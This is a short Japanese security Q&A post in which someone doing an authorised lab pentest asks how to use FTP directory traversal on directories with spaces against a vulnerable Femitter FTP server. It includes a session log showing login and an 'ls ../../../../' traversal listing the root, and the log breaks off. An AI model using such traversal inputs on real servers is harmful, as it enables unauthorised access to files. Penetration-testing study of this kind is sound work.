3
空白を含むディレクトリに対するFTPディレクトリトラバーサル攻撃
私は、閉じた参照環境で制裁されたペンテストを実施しており、一見単純な問題に苦しんでいますが、現在は解決できません。 MS Windows OSで実行されている脆弱なFermitter FTPサーバーに対してディレクトリトラバーサル攻撃を実行しようとすると、システムルートでLISTを実行できます(アドレスとコンテンツリストは参照用にここで変更しました)。 # ftp 192.168.13.22 Connected to 192.168.13.22. 220 Femitter FTP Server ready. Name (192.168.13.22:root): 331 Password required for root. Password: 230 User root logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls ../../../../ 200 Port command successful. 150 Opening data …
15
ftp
attack-vector